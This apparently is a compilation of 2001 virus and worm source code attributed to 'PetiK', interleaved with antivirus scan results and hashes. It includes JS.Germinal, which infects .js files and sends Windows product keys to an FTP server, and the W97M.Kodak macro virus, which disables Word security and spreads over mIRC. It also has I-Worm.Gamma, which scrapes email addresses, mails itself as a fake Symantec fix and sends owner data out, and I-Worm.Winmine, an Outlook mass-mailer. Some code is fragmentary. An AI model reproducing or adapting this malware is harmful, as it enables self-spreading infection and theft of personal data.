McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Ayam.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Ayam.A@mm
NOD32 4080 2009.05.15 W97M/Ayam.A
Norman 6.01.05 2009.05.16 W97M/Ayam.A
nProtect 2009.1.8.0 2009.05.16 W97M.Ayam.A@mm
Panda 10.0.0.14 2009.05.16 W97M/Maya.Worm
PCTools 4.4.2.0 2009.05.16 WORD.97.Maya.B
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Macro.Office.Melissa-based.aa
Sophos 4.41.0 2009.05.16 WM97/Munster-A
Sunbelt 3.2.1858.2 2009.05.16 Virus.MSWord.Melissa-based (v)
Symantec 1.4.4.12 2009.05.16 W97M.OutlookWorm.Gen
TheHacker 6.3.4.1.326 2009.05.15 W2KM/Sin
TrendMicro 8.950.0.1092 2009.05.15 W97M_AYAM.A
VBA32 3.12.10.5 2009.05.16 Virus.X97M.Papa
ViRobot 2009.5.15.1737 2009.05.15 W97M.Ayam.A
VirusBuster 4.6.5.0 2009.05.16 WORD.97.Maya.B
MD5...: ebe499343061e49ea4f31639fc3a7e59
SHA1..: 89de7abdbdc3fc8764d481a49125b8a3cebf6f05
// Name : JS.Germinal.A@mm
// Author : PetiK
// Date : June 1st – 2nd 2001
// Language : JScript
// Size of infection : 2357 bytes
// Action : It infects all *.JS file in \WINDOWS, \WINDOWS\DESKTOP
// and \WINDOWS\SAMPLES\WSH folders.
// It creates a TXT file with information and send this to a ftp server.
// JS.Germinal.A@mm
var WS=WScript.CreateObject("WScript.Shell")
var fso=WScript.CreateObject("Scripting.FileSystemObject")
var win=fso.GetSpecialFolder(0)
var c=fso.OpenTextFile(WScript.ScriptFullName,1)
var virus=c.ReadAll()
var dossier=new Array()

dossier[0]=fso.GetFolder(".")
dossier[1]=win
dossier[2]=win + "\\Desktop"
dossier[3]=win + "\\SAMPLES\\WSH"
for(i=0;i<4;i++){
infecte(dossier[i])
}
function infecte(dossier) {
var notredossier=fso.GetFolder(dossier)
var fichier=new Enumerator(notredossier.Files)
if(fso.GetExtensionName(fichier.item()).toUpperCase()=="JS") {
var victime=fso.OpenTextFile(fichier.item().path,1)
var marque=victime.Read(19)
var victimecode=marque+victime.ReadAll()
victime.Close()
if(marque!="// JS.Germinal.A@mm") {
var victime=fso.CreateTextFile(fichier.item().path,2)
victime.Write(virus+victimecode)
victime.Close()
}
}
}
WS.RegWrite ("HKLM\\Software\\","JS.Germinal Par PetiK 02/05/2001");

WS.RegWrite ("HKCU\\Software\\","JS.Germinal Par PetiK 02/05/2001");
var nom=WS.RegRead
("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RegisteredOwner")
var org=WS.RegRead
("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RegisteredOrganization")
var id=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ProductId")
var key=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ProductKey")
var ver=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Version")
var vernum=WS.RegRead
("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\VersionNumber")
var txt=fso.CreateTextFile("C:\\"+nom+".txt",2)
txt.WriteLine ("Information de " + nom + " à " + org);
txt.WriteLine ("");
txt.WriteLine ("Numéro d'identification : " + id);
txt.WriteLine ("Numéro de la clé : " + key);
txt.WriteLine ("Version de windows : " + ver + " " + vernum);
txt.Close()
var drv=fso.CreateTextFile(win+"\\PetiK.drv",2)
drv.WriteLine ("open");
drv.WriteLine ("members.aol.com");
drv.WriteLine ("pentasm99");
drv.WriteLine ("ascii")
drv.WriteLine ("put C:\\"+nom+".txt");
drv.WriteLine ("bye");
drv.WriteLine ("exit");
drv.Close()
WS.Run ("command.com /c ftp.exe -i -v -s:"+win+"\\PetiK.drv")
// Par PetiK 2nd June 2001

File Germinal.js received on 05.16.2009 11:58:21 (CET)

a-squared 4.0.0.101 2009.05.16 Virus.JS.Germinal!IK
AhnLab-V3 5.0.0.2 2009.05.15 JS/Germinal
AntiVir 7.9.0.168 2009.05.15 JSC/Germinal.1
Antiy-AVL 2.0.3.1 2009.05.15 Virus/JS.JS
Authentium 5.1.2.4 2009.05.15 JS/Germinal.A
Avast 4.8.1335.0 2009.05.15 Unix:Malware-gen
AVG 8.5.0.336 2009.05.15 -
BitDefender 7.2 2009.05.16 JS.Germinal.A
CAT-QuickHeal 10.00 2009.05.15 JS_/Germinal
ClamAV 0.94.1 2009.05.15 JS.Germinal
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 JS.Optiz
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 JS/Germin
F-Prot 4.4.4.56 2009.05.15 JS/Germinal.A
F-Secure 8.0.14470.0 2009.05.15 Virus.JS.Germinal
Fortinet 3.117.0.0 2009.05.16 JS/GERMINAL.A
GData 19 2009.05.16 JS.Germinal.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.JS.Germinal
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Virus.JS.Germinal
McAfee 5616 2009.05.15 JS/Germinal
McAfee+Artemis 5616 2009.05.15 JS/Germinal
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Germinal.1
Microsoft 1.4602 2009.05.16 Trojan:JS/Germinal.A
NOD32 4080 2009.05.15 JS/Germinal.A
Norman 6.01.05 2009.05.16 JS/Germinal.B
nProtect 2009.1.8.0 2009.05.16 JS.Germinal.A
Panda 10.0.0.14 2009.05.16 -
PCTools 4.4.2.0 2009.05.15 JS.Germinal.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Script.Germinal.Trojan
Sophos 4.41.0 2009.05.16 JS/Germinal
Sunbelt 3.2.1858.2 2009.05.16 Virus.JS.Germinal (v)
Symantec 1.4.4.12 2009.05.16 JS.Lamnireg.A.Trojan
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 JS_GERMINAL.A
VBA32 3.12.10.5 2009.05.16 Virus.JS.Germinal
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 JS.Germinal.A
MD5...: b90254895d6169a8d111a508e2638c51
SHA1..: 7669c66d338b4208536c32924bcab95996cf8c3e
' Name : W97M.Kodak
' Author : PetiK
' Date : June 5th 2001
' Size 3,030 bytes
'
' Macro AutoOpen : Create a “script.ini” file for mIRC. If the day is the 5th
' the virus display a Baloon Message. It copies itself to /Windows/Kodak.doc.
'
' Macro AutoClose : It alters the security in Word 9.0 and 10.0 (2000 and XP)
' It copies his code into the file “Kodak.vxd” and put it in the “NORMAL.DOT”.
' When a new file is create, the code of the macro is writes in this file.
' To avoid infect two times “NORMAL.DOT”, the virus adds the value :
' HKEY_LOCAL_MACHINE\Software\Microsoft\W97M.Kodak = CliClac
'
' Macro HelpAbout : Display an other Baloon Message
'
' Macro ViewVBCode : Display a Message Box and shoxs Visual Basic Editor
'
' Macro ToolsOptions and Security : Find yourself.
'W97M.Kodak by PetiK 05/10/2001

Sub AutoOpen()
ActiveDocument.SaveAs FileName:="C:\Windows\Kodak.doc"
ActiveDocument.Saved = True
Open "C:\script.drv" For Output As #1
Print #1, "n0=on 1:JOIN:#:{"
Print #1, "n1= /if ( $nick == $me ) { halt }"
Print #1, "n2= /.dcc send $nick C:\Windows\Kodak.doc"
Print #1, "n3=}"
Close #1
FileSystem.FileCopy "C:\script.drv", "C:\mirc\script.ini"
FileSystem.FileCopy "C:\script.drv", "C:\mirc32\script.ini"
FileSystem.FileCopy "C:\script.drv", "C:\progra~1\mirc\script.ini"
FileSystem.FileCopy "C:\script.drv", "C:\progra~1\mirc32\script.ini"
FileSystem.Kill "C:\script.drv"
With Application.Assistant
.Visible = True
End With
With Assistant.NewBalloon
.Text = "I am always here. And you, are you here."
.Heading = "W97M.Kodak"
.Animation = msoAnimationGetAttentionMajor
.Button = msoButtonSetOK
.Show
End With
End If
End Sub
Sub AutoClose()
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> 1& Then
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End If
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") <> 1& Then
End If
If Dir("C:\Kodak.vxd", vbReadOnly) = "" Then
Open "C:\Kodak.vxd" For Output As #1
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
K = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
Print #1, K
Next i
Close #1
SetAttr "C:\Kodak.vxd", vbReadOnly
End If
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\",
"W97M.Kodak") <> "ClicClac" Then
NormalTemplate.VBProject.VBComponents.Import "C:\Kodak.vxd"
NormalTemplate.Save
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\", "W97M.Kodak") =
"ClicClac"
End If
ActiveDocument.VBProject.VBComponents.Import "C:\Kodak.vxd"
ActiveDocument.Save
End Sub
Sub HelpAbout()
.Visible = True
End With
.Text = "Smile and cheese for the photo"
.Heading = "W97M.Kodak"
.Show
End With
End Sub
Sub ViewVBCode()
MsgBox "was coded by PetiK(c)2001", vbInformation, "W97M.Kodak"
End Sub
Sub ToolsOptions()
Options.VirusProtection = 1
Options.SaveNormalPrompt = 1
Dialogs(wdDialogToolsOptions).Show
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
End Sub
Sub ToolsSecurity()
CommandBars("Macro").Controls("Security...").Enabled = True
Dialogs(wdDialogToolsSecurity).Show
CommandBars("Macro").Controls("Security...").Enabled = False
End Sub
File Kodak.doc received on 05.16.2009 17:43:05 (CET)
a-squared 4.0.0.101 2009.05.16 Virus.MSWord.Adok!IK
AhnLab-V3 5.0.0.2 2009.05.16 W97M/Adok
AntiVir 7.9.0.168 2009.05.15 W2000M/Petman.A
Authentium 5.1.2.4 2009.05.16 W97M/Adok.A
Avast 4.8.1335.0 2009.05.15 MW97:Adok-A
AVG 8.5.0.336 2009.05.15 W97M/Ethan
BitDefender 7.2 2009.05.16 W97M.Kdk.A
CAT-QuickHeal 10.00 2009.05.15 W97M.ZMK.M
ClamAV 0.94.1 2009.05.16 WM.Psycho
Comodo 1157 2009.05.08 Virus.MSWord.Adok
DrWeb 5.0.0.12182 2009.05.16 W97M.Petik
eSafe 7.0.17.0 2009.05.14 O97M.GNcc
eTrust-Vet 31.6.6508 2009.05.16 W97M/Adok.A
F-Prot 4.4.4.56 2009.05.16 W97M/Adok.A
F-Secure 8.0.14470.0 2009.05.15 Virus.MSWord.Adok
Fortinet 3.117.0.0 2009.05.16 W97M/Adok.A
GData 19 2009.05.16 W97M.Kdk.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.MSWord.Adok
K7AntiVirus 7.10.737 2009.05.16 Macro.Adok
Kaspersky 7.0.0.125 2009.05.16 Virus.MSWord.Adok
McAfee 5616 2009.05.15 W97M/Generic
McAfee+Artemis 5616 2009.05.15 W97M/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Petman.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Adok.A
NOD32 4080 2009.05.15 W97M/Adok.A
Norman 6.01.05 2009.05.16 W97M/Adok.A
nProtect 2009.1.8.0 2009.05.16 W97M.Kdk.A
Panda 10.0.0.14 2009.05.16 W97M/Kodak.worm
PCTools 4.4.2.0 2009.05.16 WORD.97.Adok.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Macro.Word97.Adok
Sophos 4.41.0 2009.05.16 WM97/Adok-A
Sunbelt 3.2.1858.2 2009.05.16 W97M.Adok (v)
Symantec 1.4.4.12 2009.05.16 W97M.Adok.A
TheHacker 6.3.4.1.326 2009.05.15 W2KM/Generico
TrendMicro 8.950.0.1092 2009.05.15 W97M_ABOTUS.A
VBA32 3.12.10.5 2009.05.16 Virus.W97M.Ethan
ViRobot 2009.5.15.1737 2009.05.15 W97M.Adok
VirusBuster 4.6.5.0 2009.05.16 WORD.97.Adok.A
MD5...: 84a74bcf024ac4779d20e2b667bc6da6
SHA1..: 99cbae9ae51381d5f7eb637b12d42e790f48db33
comment #
Name : I-Worm.Gamma (w32gammaworm)
Author : PetiK
Date : May 29th - June 9th
Size : 8704 bytes
Action : Check if the file is /WINDOWS/SYSTEM.SETUP.EXE. Whether it's not this file, it
will copies to /WINDOWS/SYSTEM.SETUP.EXE. It alters the run= line in the Win.ini file to
the name of the copy. It displays a message.
Otherwise, he create C:\gamma and copies it to C:\mirc, C:\mirc32, C:\progra~1\mirc or
C:\progra~1\mirc32. After, it creates C:\Data and put a file info.vbs. This file send a
message to gamma@multimania.com :
Subject : Message from + Name of the registered user

Body : Time, Date, Organization I-Worm.Gamma
On the 5th, when the day is Wednesday, a message is displayed. When the user click on
"OK", the worm swap the buttons of the mouse.
The worms waits for an active Internet connection and tries to establish one by attemping
to www.symantec.com. When the connection is successful, it scans all *.*htm* file in
"Temporary Inetrnet Files" to find email adresses. When the worms finds it, it sends a
copy of him to the address :
From : snd @symantec.com

Date : 06/06/2001
Subject : Virus/Worms Fix from Symantec Corporation (Norton Antivirus)
Body : Hi,
Symantec Corporation send you the last version of our tool Virus/Worms Fix.
Here is the version 3.1 .
This tool detect, repair and protect users against Bloodhound.IRC.Worm,
Bloodhound.VBS.Worm, Bloodhound.W32 and Bloodhound.WordMacro .
With Regards,
Symantec Corporation (http://www.symantec.com)
Attachment : SETUP.EXE
#
.586p
.model flat,stdcall
include useful.inc
extrn CreateFileMappingA:PROC
extrn FindClose:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn gethostbyname:PROC
extrn GetFileSize:PROC
extrn lstrcat:PROC
extrn lstrcmp:PROC
extrn MAPILogoff:PROC
extrn MAPILogon:PROC
extrn MAPISendMail:PROC
extrn MapViewOfFile:PROC
extrn RegQueryValueExA:PROC
extrn SetCurrentDirectoryA:PROC
extrn Sleep:PROC
extrn UnmapViewOfFile:PROC
extrn WinExec:PROC
.data
szComName db 50 dup (0)
szTif db 7Fh dup (0)
FileHandle dd ?
RegHandle dd ?
SrchHandle dd ?
octets dd ?
ValueType dd 0
mail_address db 128 dup (?)
MAPISession dd 0
DIR db "C:\Data",00h
information db "C:\Data\info.vbs",00h
infoexec db "wscript C:\Data\info.vbs",00h
mirc db "C:\gamma",00h
script3 db "C:\progra~1\mirc\script.ini",00h
script4 db "C:\progra~1\mirc32\script.ini",00h
Copie db "\SETUP.EXE",00h
run db "run",00h
TEXTE db "This file does not appear to be a Win32 valid file. ",00h
TITRE2 db "I-Worm.Gamma (c)2001",00h
TEXTE2 db "PetiK greets you",00h
symantec db "www.symantec.com",00h
tempnetfile db "\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders",00h
Value db "Cache",00h
FICHIER db "*.*htm*",00h
FILE_MAP_READ equ 00000004h
GENERIC_READ equ 80000000h
HKEY_USERS equ 80000003h
KEY_QUERY_VALUE equ 00000001h
MAX_PATH equ 260
PAGE_READONLY equ 00000002h
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
time struc
LowDateTime dd ?
HighDateTime dd ?
time ends
win32 struc
FileAttributes dd ?
CreationTime time ?
LastAccessTime time ?
LastWriteTime time ?
FileSizeHifh dd ?
FileSizeLow dd ?
Reserved0 dd ?
Reserved1 dd ?
FileName dd MAX_PATH (?)
AlternativeFileName db 13 dup (?)
db 3 dup (?)
win32 ends
CHERCHE win32 <>
mircd: db "[script]",0dh,0ah
db ";Don't delete this file",0dh,0ah
db "n0=ON 1:JOIN:#:{",0dh,0ah
db "",0dh,0ah
db "n3=}",0dh,0ah
MIRCTAILLE equ $-mircd
infod: db ''' Symantec ScriptBlocking Authenticated File',0dh,0ah

db ''' A3C7B6E0-5535-11D5-911D-444553546170',0dh,0ah
db '',0dh,0ah
db 'set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'set w=CreateObject("WScript.Shell")',0dh,0ah
db 'If w.RegRead("HKLM\Software\Gamma\") <> "OK" Then',0dh,0ah
db 'set o=CreateObject("Outlook.Application")',0dh,0ah
db 'set m=o.CreateItem(0)',0dh,0ah
db
'n=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")',0dh,0ah
db
'p=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")',0d
h,0ah
db 'm.To = "gammaworm@multimania.com"',0dh,0ah
db 'm.Subject = "Message from " & n',0dh,0ah
db 's = "Time : " & time',0dh,0ah
db 's = s & vbCrLf & "Date : " & date',0dh,0ah
db 's = s & vbCrLf & "Organization : " & p',0dh,0ah
db 's = s & vbCrLf & vbCrLf & " I-Worm.Gamma"',0dh,0ah
db 'm.Body = s',0dh,0ah
db 'm.DeleteAfterSubmit=True',0dh,0ah
db 'm.Send',0dh,0ah
db 'w.RegWrite "HKLM\Software\Gamma\", "OK"',0dh,0ah
db 'End If',0dh,0ah
INFOTAILLE equ $-infod
Email dd ?
dd offset Subject
dd offset Message
dd ?
dd offset DateS
dd ?
dd 2
dd offset MelFrom
dd 1
dd offset MelTo
dd 1
dd offset Attach
MelFrom dd ?
dd ?
dd offset MelFrom
dd offset sAddr
dd ?
dd ?
MelTo dd ?
dd 1
dd offset MelTo
dd offset mail_address
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset szOrig
dd ?
dd ?
Subject db "Virus/Worms Fix from Symantec Corporation (Norton Antivirus)",00h
Message db "Hi,",0dh,0ah,0dh,0ah
db "Symantec Corporation send you the last version of our tool Virus/Worms Fix. "
db "Here is the version 3.1 .",0dh,0ah
db "This tool detect, repair and protect users against Bloodhound.IRC.Worm, "
db "Bloodhound.VBS.Worm, Bloodhound.W32 and Bloodhound.WordMacro .",0dh,0ah,0dh,0ah
db 09h,09h,"With Regards,",0dh,0ah
db 09h,09h,"Symantec Corporation (http://www.symantec.com)",00h
DateS db "06/06/2001",00h
sAddr db "snd@symantec.com",00h
.code
DEBUT:
VERIF: push 00h
push 50
push offset szOrig
push eax
push 50h
push offset szCopie
push offset Copie
push offset szCopie
call lstrcat
push offset szOrig

push offset szCopie
call lstrcmp
test eax,eax
jz MIRC
COPIE: push 00h

push offset szCopie
push offset szOrig
call CopyFileA
WININI: push 50
push offset szWinini
push offset Winini
call lstrcat
push offset szCopie
push offset run
push offset windows
MESSAGE:push 1010h
push offset szOrig
push offset TEXTE
push 00h
call MessageBoxA
jmp FIN
MIRC: push 00h

push CREATE_ALWAYS
push 00h
push GENERIC_WRITE
push offset mirc
call CreateFileA
push 00h
push offset octets
push MIRCTAILLE
push offset mircd
push [FileHandle]
call WriteFile
push [FileHandle]
call CloseHandle
C_MIRC: push 00h
push offset script1
push offset mirc
call CopyFileA
push 00h
push offset script2
push offset mirc
call CopyFileA
push 00h
push offset script3
push offset mirc
call CopyFileA
push 00h
push offset script4
push offset mirc
call CopyFileA
INFO: push offset DIR

call CreateDirectoryA
push 00h
push CREATE_NEW
push 00h
push GENERIC_WRITE
push offset information
call CreateFileA
cmp eax,-1
je DATE
push 00h
push offset octets
push INFOTAILLE
push offset infod
push [FileHandle]
call WriteFile
push [FileHandle]
call CloseHandle
push 01h
push offset infoexec
call WinExec

call GetSystemTime
cmp [SystemTime.wDayOfWeek],03h
jne NET
jne NET
push 40h
push offset TITRE2
push offset TEXTE2
push 00h
call MessageBoxA
push 01h
call SwapMouseButton
jmp NET
PAUSE: push 60 * 3 * 1000

call Sleep
NET: push offset symantec

call gethostbyname
test eax,eax
jz PAUSE
TIF: push offset RegHandle
push KEY_QUERY_VALUE
push 00h
push offset tempnetfile
push HKEY_USERS
call RegOpenKeyExA
test eax,eax
jnz FIN
push 7Fh
push offset szTif
push 00h
push offset Value
push [RegHandle]
call RegQueryValueExA
push [RegHandle]
call RegCloseKey
TIFCH: push offset szTif

call SetCurrentDirectoryA
FFF: push offset CHERCHE

push offset FICHIER
call FindFirstFileA
cmp eax,-1
je FC
mov [SrchHandle],eax
cHTML: call HTML
FNF: push offset CHERCHE
push [SrchHandle]
call FindNextFileA
dec eax
jnz cHTML
FC: push [SrchHandle]
call FindClose
END_S: popad
FIN: push 00h

call ExitProcess
HTML: pushad
push 00h
push OPEN_EXISTING
push 00h
push GENERIC_READ
push offset CHERCHE.FileName
call CreateFileA
inc eax
je END_S
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push ebx
call CreateFileMappingA
test eax,eax
jz FERME1
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push ebp
call MapViewOfFile
test eax,eax
jz FERME2
xchg eax,esi
push 00h
push ebx
call GetFileSize
xchg eax,ecx
jecxz FERME3
ls_s_m: call @mt

db 'mailto:'
@mt: pop edi
l_s_m: pushad
push 07h
pop ecx
rep cmpsb
popad
je s_m
inc esi
loop l_s_m
FERME3: push esi

call UnmapViewOfFile
FERME2: push ebp
call CloseHandle
FERME1: push ebx
call CloseHandle
popad
ret
s_m: xor edx,edx

add esi,7
mov edi,offset mail_address
push edi
n_c: lodsb
cmp al,' '
je s_c
cmp al,'"'
je e_c
cmp al,''''
je e_c
cmp al,'@'
jne o_a
inc edx
o_a: stosb
jmp n_c
s_c: inc esi
jmp n_c
e_c: xor al,al
stosb
pop edi
test edx,edx
je ls_s_m
mapiln: xor eax,eax

push dword ptr [MAPISession]
push eax
push eax
push eax ; password
push eax ; username
push eax
call MAPILogon
mapism: xor eax,eax

push eax
push eax
push offset Email
push eax
push word ptr [MAPISession]
call MAPISendMail
mapilf: xor eax,eax
push eax
push eax
push eax
push dword ptr [MAPISession]
call MAPILogoff
jmp ls_s_m
end DEBUT
File Gamma.exe received on 05.16.2009 11:58:18 (CET)
Authentium 5.1.2.4 2009.05.15 W32/Malware!d62f
Avast 4.8.1335.0 2009.05.15 Win32:Gamma
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Win32.Petik.C@mm
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 Worm.Petik.AV.09
Comodo 1157 2009.05.08 Worm.Win32.Petik.C
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8704
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Mania
F-Prot 4.4.4.56 2009.05.15 W32/Malware!d62f
Fortinet 3.117.0.0 2009.05.16 W32/PetTick.D@mm
GData 19 2009.05.16 Win32.Petik.C@mm
Microsoft 1.4602 2009.05.16 Worm:Win32/Petik.C@mm
NOD32 4080 2009.05.15 Win32/Petik.C
Norman 6.01.05 2009.05.16 W32/Pet_Tick.8704.A
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 DDoS/Petik.C
PCTools 4.4.2.0 2009.05.15 I-Worm.Gamma.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.g
Sophos 4.41.0 2009.05.16 W32/Gamma
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.D
VBA32 3.12.10.5 2009.05.16 OScope.Dialer.GMHA
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.8704.A
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Gamma.A
MD5...: 997ae169da2f57e7e48e6862eb70223a
SHA1..: b7349d6e5c65551d1162597cf4871b0c8e04e6b1
comment #
Name : I-Worm.Winmine
Author : PetiK
Date : June 12th - June 15th
Size : 6656 bytes
Action : Check if the file is run from the SYSTEM folder. If so, it creates a file with
the name
"C:\ENVOIE_VBS.vbs" to spread with Outlook :
Subject : Is the work so hard ??
Body : Relax you with the last version of <Winmine>.
Attached : WINMINE.EXE
It chages the start page of Internet Explorer by
"http://perso.libertysurf.fr/dacruz/mayaindex.html"
If the current day is the 15th, it displays a message and swaps the buttons of the mouse.
After five minutes, the worms stops the computer.
Otherwise, it copies itself to SYSTEM folder, alters the load= line in WIN.INI file to
run when
the computer starts and displays a message box.
#
.586p
.model flat
.code
callx macro a
extrn a:proc
call a
endm
DEBUT:
VERIF: push 00h
callx GetModuleHandleA
push 50
push offset szOrig
push eax
callx GetModuleFileNameA
push 50h
push offset szCopie
callx GetSystemDirectoryA
push offset Copie
push offset szCopie
callx lstrcat
push offset szOrig

push offset szCopie
callx lstrcmp
test eax,eax
jz SEND
COPIE: push 00h
push offset szCopie
push offset szOrig
callx CopyFileA
WININI: push 50
callx GetWindowsDirectoryA
push offset Winini
callx lstrcat
push offset szCopie
push offset load
push offset windows
callx WritePrivateProfileStringA
MESSAGE:push 1040h
push offset TITRE
push offset TEXTE
push 00h
callx MessageBoxA
jmp FIN
SEND: push 00h
push CREATE_NEW
push 00h
push GENERIC_WRITE
push offset vbssend
callx CreateFileA
cmp eax,-1
je GO
push 00h
push offset octets
push VBSTAILLE
push offset vbsd
push [FileHandle]
callx WriteFile
push [FileHandle]
callx CloseHandle
GO: push 01h
push offset onyva
callx WinExec
DLL: push offset dllName

callx LoadLibraryA
test eax,eax
jz DATE
mov hdll,eax
push offset FunctionName
push hdll
callx GetProcAddress
test eax,eax
jz DATE
mov setvalue,eax
REG: push 08h
push offset start_page
push 01h
push offset start_key
push offset main_s
push HKEY_CURRENT_USER
call [setvalue]
FINDLL: push [hdll]
callx FreeLibrary

callx GetSystemTime
cmp [SystemTime.wDay],0Fh
jne FIN
push 40h
push offset TITRE2
push offset TEXTE2
push 00h
callx MessageBoxA
push 01h
callx SwapMouseButton
push 60 * 5 * 1000
callx Sleep
push EWX_SHUTDOWN
callx ExitWindowsEx
FIN: push 00h

callx ExitProcess
.data
FileHandle dd ?
octets dd ?
hdll dd ?
setvalue dd ?
Copie db "\WINMINE.EXE",00h
vbssend db "C:\ENVOIE_VBS.vbs",00h
onyva db "wscript C:\ENVOIE_VBS.vbs",00h
load db "load",00h
TITRE db "Winmine - Microsoft Corporation (R)",00h
TEXTE db "The last update of the game ""Winmine"" written by Microsoft
Corporation",00h
TITRE2 db "I-Worm.Winmine",00h
TEXTE2 db "By PetiK (c)2001",00h
main_s db "Software\Microsoft\Internet Explorer\Main",00h
start_key db "Start Page",00h
start_page db "http://perso.libertysurf.fr/dacruz/mayaindex.html",00h
dllName db "SHLWAPI.dll",00h
FunctionName db "SHSetValueA",00h
wormname db "I-Worm.Winmine by PetiK",00h
vbsd:
db 'Set A=CreateObject("Outlook.Application")',0dh,0ah
db 'Set B=A.GetNameSpace("MAPI")',0dh,0ah
db 'For Each C In B.AddressLists',0dh,0ah
db 'If C.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For D=1 To C.AddressEntries.count',0dh,0ah
db 'Set E=C.AddressEntries(D)',0dh,0ah
db 'Set F=A.CreateItem(0)',0dh,0ah
db 'F.To=E.Address',0dh,0ah
db 'F.Subject="Is the work so hard ??"',0dh,0ah
db 'F.Body="Relax you with the last version of <Winmine>."',0dh,0ah
db 'Set G=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'F.Attachments.Add G.BuildPath(G.GetSpecialFolder(1),"Winmine.exe")',0dh,0ah
db 'F.DeleteAfterSubmit=True',0dh,0ah
db 'If F.To <> "" Then',0dh,0ah
db 'F.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',00h

EWX_SHUTDOWN equ 00000001h
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
end DEBUT
end
File Winmine.exe received on 05.10.2009 23:52:01 (CET)

AhnLab-V3 5.0.0.2 2009.05.09 Win32/Petik.worm.6656
Authentium 5.1.2.4 2009.05.10 W32/Malware!cc55
Avast 4.8.1335.0 2009.05.10 Win32:Petik-Winmine
AVG 8.5.0.327 2009.05.10 I-Worm/Petik
BitDefender 7.2 2009.05.10 Generic.Malware.Msp!.4B5A9B45
CAT-QuickHeal 10.00 2009.05.09 -
ClamAV 0.94.1 2009.05.10 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.B
DrWeb 5.0.0.12182 2009.05.10 Win32.Petik.6656
eSafe 7.0.17.0 2009.05.10 -
eTrust-Vet 31.6.6497 2009.05.08 Win32/Petik.6656.C
F-Prot 4.4.4.56 2009.05.10 W32/Malware!cc55
Fortinet 3.117.0.0 2009.05.10 W32/Petik!worm
GData 19 2009.05.10 Generic.Malware.Msp!.4B5A9B45
Microsoft 1.4602 2009.05.10 Worm:Win32/Pet_tik.G@mm
NOD32 4063 2009.05.08 Win32/Petik.B
Norman 6.01.05 2009.05.08 W32/Pet_Tick.6656.C
Panda 10.0.0.14 2009.05.10 W32/Petik
PCTools 4.4.2.0 2009.05.07 I-Worm.Petik.H
Rising 21.28.62.00 2009.05.10 Trojan.WINMINE
Sophos 4.41.0 2009.05.10 W32/Winmine
Symantec 1.4.4.12 2009.05.10 -
TrendMicro 8.950.0.1092 2009.05.08 WORM_MINEUP.A
ViRobot 2009.5.9.1727 2009.05.09 -
VirusBuster 4.6.5.0 2009.05.10 I-Worm.Petik.H
MD5...: 23f6db768eacfa01a352a657acb26c9b
SHA1..: bc83ebddddead5521afeefd9e9df47e342f05153
' Name : VBS.Seven.A
' Author : PetiK
' Size : 3626 byte
